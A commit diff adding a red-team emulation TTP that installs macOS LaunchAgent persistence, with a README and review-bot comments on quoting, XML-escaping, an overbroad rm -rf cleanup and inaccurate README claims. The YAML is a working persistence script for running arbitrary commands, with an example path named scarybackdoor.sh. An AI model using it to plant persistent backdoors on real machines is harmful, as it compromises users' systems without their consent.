Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Showing 2 changed files with 82 additions and 0 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,40 @@ | ||
# macOS Launch Agent Persistence | ||
|
||
Create and manage a launch agent on macOS, allowing for persistent execution of a | ||
given script or command. The launch agent will execute the specified script or | ||
command each time the system reboots or the user logs in. | ||
|
||
## Arguments | ||
|
||
- **command_or_path**: This argument specifies the path to the script or a bash | ||
command to be run by the launch agent. | ||
|
||
- **cleanup**: When set to true, it will remove the launch agent plist file and | ||
any related scripts, undoing the persistence setup. | ||
|
||
## Pre-requisites | ||
|
||
Ensure that you have the necessary permissions to create files in the user's | ||
`~/Library/LaunchAgents` directory and execute the specified script or command. | ||
|
||
## Examples | ||
|
||
Set up launch agent persistence with a specific script. The agent will execute | ||
the script every time the system reboots or the user logs in. If cleanup is set | ||
to true, the launch agent and related files will be removed after 3 minutes: | ||
|
||
```bash | ||
ttpforge -c config.yaml \ | ||
run ttps/persistence/macos/launch-agent-persistence/launch-agent-persistence.yaml \ | ||
--arg command_or_path="/Users/Shared/scarybackdoor.sh" \ | ||
--arg cleanup=true | ||
``` | ||
|
||
Alternatively, you can use a direct bash command: | ||
|
||
```bash | ||
ttpforge -c config.yaml \ | ||
run ttps/persistence/macos/launch-agent-persistence/launch-agent-persistence.yaml \ | ||
--arg command_or_path="bash -c echo Oh uh" \ | ||
--arg cleanup=true | ||
``` |
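Review bot: The second example, `--arg command_or_path="bash -c echo Oh uh"`, will not print the text. The plist added in this commit already passes the value to `bash -c`, so the agent runs `bash -c "bash -c echo Oh uh"`, and the inner `bash -c echo Oh uh` executes a bare `echo` with `Oh` and `uh` as positional parameters. Pass only the command, for example `--arg command_or_path="echo Oh uh"`. Separately, the Examples text says the files are removed "after 3 minutes" and the `cleanup` argument mentions "any related scripts", but the YAML in this commit has no delay and creates no scripts; drop those statements or implement them.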
42 changes: 42 additions & 0 deletions
persistence/macos/launch-agent-persistence/launch-agent-persistence.yaml
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,42 @@ | ||
--- | ||
name: macOS Launch Agent persistence. | ||
description: | | ||
Simple TTP to setup and load launch agent persistence on macOS. | ||
args: | ||
- name: cleanup | ||
- name: command_or_path | ||
|
||
steps: | ||
- name: launchagent | ||
inline: | | ||
command_or_path="{{args.command_or_path}}" | ||
echo "===> Creating ~/Library/LaunchAgents if it does not already exist..." | ||
mkdir -p /Users/$USER/Library/LaunchAgents | ||
echo "===> Writing plist to ~/Library/LaunchAgents/com.ttpforge.plist" | ||
cat <<EOF > ~/Library/LaunchAgents/com.ttpforge.plist | ||
<?xml version="1.0" encoding="UTF-8"?> | ||
<!DOCTYPE plist PUBLIC "-//Apple/DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> | ||
<plist version="1.0"> | ||
<dict> | ||
<key>Label</key> | ||
<string>com.ttpforge.plist</string> | ||
<key>ProgramArguments</key> | ||
<array> | ||
<string>bash</string> | ||
<string>-c</string> | ||
<string>$command_or_path</string> | ||
</array> | ||
<key>KeepAlive</key> | ||
<true/> | ||
</dict> | ||
</plist> | ||
EOF | ||
echo "===> Persistence done. ~/Library/LaunchAgents/com.ttpforge.plist dropped which executes $command_or_path. Persistence will be loaded on next reboot." | ||
cleanup: | ||
inline: | | ||
if [[ "{{args.cleanup}}" == "true" ]]; then | ||
rm -rf ~/Library/LaunchAgents/com.ttpforge.plist /tmp/launchagent-* | ||
fi |
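Review bot: `command_or_path` reaches both the shell and the plist unescaped in the `launchagent` step. Because `command_or_path="{{args.command_or_path}}"` templates the value into a double-quoted assignment, a value containing `"` breaks the script and any `$` or backticks in it are expanded when the step runs rather than when the agent fires; `<string>$command_or_path</string>` then yields invalid XML for any command containing `&` or `<` (for example `a && b`). Suggest passing the value through a single-quoted heredoc or an environment variable, XML-escaping it before writing, and checking the result with `plutil -lint`. In `cleanup`, `rm -rf ... /tmp/launchagent-*` deletes files in a shared directory that no step here creates; restrict it to the plist. The description says "setup and load", but nothing calls `launchctl` and the step's own message says loading happens on next reboot, so the description should match. Minor: `mkdir -p /Users/$USER/Library/LaunchAgents` should use `~` or `"$HOME"` like the other lines, the `Label` value `com.ttpforge.plist` carries a file extension, and `KeepAlive` set to true will make launchd restart a short-lived command every time it exits.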